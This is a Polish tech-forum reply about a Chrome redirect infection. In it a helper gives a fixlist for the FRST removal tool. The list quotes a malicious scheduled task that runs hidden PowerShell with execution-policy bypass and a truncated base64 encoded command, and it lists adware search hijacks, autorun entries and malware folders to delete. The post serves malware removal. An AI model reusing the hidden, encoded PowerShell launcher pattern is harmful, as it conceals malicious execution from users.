Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

dziwne przekierowanie google chrom

bolek263 06 Mar 2016 14:29 528 1
  • Pomocny post
    #2 06 Mar 2016 16:34
    krzychupar
    Poziom 40  

    Jeszcze log Addition.txt

    Dodano po 1 [godziny] 55 [minuty]:

    Otwórz notatnik systemowy i wklej:
    Task: {695DB868-7AC8-48B8-9AA2-574AF947E88E} - System32\Tasks\{0B7D0A47-7A79-0E05-0D11-797E0F7E117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (dane wartości zawierają 9356 znaków więcej).
    Hosts:
    HKU\S-1-5-21-3565814362-3438041228-2249517483-1000\...\MountPoints2: {9f212ad9-a98a-11e5-9ac6-c40229d97301} - H:\autorun.exe
    HKU\S-1-5-21-3565814362-3438041228-2249517483-1000\...\MountPoints2: {e2849463-a99c-11e5-bab2-b0a52bc0da11} - G:\AUTOSTARTER.EXE
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    SearchScopes: HKU\S-1-5-21-3565814362-3438041228-2249517483-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-3565814362-3438041228-2249517483-1000 -> {038CB375-DD3D-4C17-A0A8-4F6E2532DF2B} URL = hxxps://search.yahoo.com/search?fr=chr-greent...mp;ei=utf-8&ilc=12&type=435371&p={searchTerms}
    BHO-x32: Discovery App -> {ba32987d-db80-4ccb-a8bb-f812b5421c0f} -> C:\Program Files (x86)\Discovery App\Extensions\ba32987d-db80-4ccb-a8bb-f812b5421c0f.dll => Brak pliku
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.piesearch.com/?type=sc&ts=1451...&uid=cd6ee4b7-4dc5-49b4-893a-3821d0c30225
    U3 ayi8rlt9; C:\Windows\System32\Drivers\ayi8rlt9.sys [0 ] (Microsoft Corporation) <==== UWAGA (zerobajtowy plik/folder)
    S1 wfdrvr_vt_1_10_0_28; system32\drivers\wfdrvr_vt_1_10_0_28.sys [X]
    2016-03-06 12:12 - 2016-03-06 12:13 - 00000000 ____D C:\ProgramData\4039a5ff-47f5-1
    2016-03-06 12:12 - 2016-03-06 12:12 - 00000000 ____D C:\ProgramData\4039a5ff-0b17-0
    2016-03-06 06:12 - 2016-03-06 06:12 - 00000000 ____D C:\ProgramData\4039a5ff-54b1-0
    2016-03-06 06:12 - 2016-03-06 06:12 - 00000000 ____D C:\ProgramData\4039a5ff-3043-1
    2016-03-06 00:12 - 2016-03-06 00:12 - 00000000 ____D C:\ProgramData\4039a5ff-3b05-1
    2016-03-06 00:12 - 2016-03-06 00:12 - 00000000 ____D C:\ProgramData\4039a5ff-19d3-0
    2016-03-05 18:12 - 2016-03-05 18:12 - 00000000 ____D C:\ProgramData\4039a5ff-77f3-1
    2016-03-05 18:12 - 2016-03-05 18:12 - 00000000 ____D C:\ProgramData\4039a5ff-5ce3-0
    2016-03-05 12:12 - 2016-03-05 12:12 - 00000000 ____D C:\ProgramData\4039a5ff-4c25-0
    2016-03-05 12:12 - 2016-03-05 12:12 - 00000000 ____D C:\ProgramData\4039a5ff-1fc5-1
    2016-02-27 18:07 - 2016-03-05 09:48 - 00000000 ____D C:\ProgramData\4039a5ff-5cc1-0
    2016-02-27 18:07 - 2016-03-05 09:48 - 00000000 ____D C:\ProgramData\4039a5ff-3aa5-0
    2016-02-27 18:07 - 2016-02-27 18:07 - 00000000 ____D C:\ProgramData\6e34c50a
    2016-02-27 18:07 - 2016-02-27 18:07 - 00000000 ____D C:\ProgramData\{224eeded-612c-0}
    2016-02-27 18:07 - 2016-02-27 18:07 - 00000000 ____D C:\ProgramData\{00865464-212c-1}
    2016-02-27 18:07 - 2015-12-23 18:57 - 00000000 ____D C:\ProgramData\2fde8768-7da7-0
    2016-02-27 18:07 - 2015-12-23 18:57 - 00000000 ____D C:\ProgramData\2fde8768-69f7-1
    C:\ProgramData\fontcacheev1.dat
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\xxxx\Downloads\FRST64.exe2016-03-06
    Uruchom FRST i kliknij w Fix/Napraw.

    0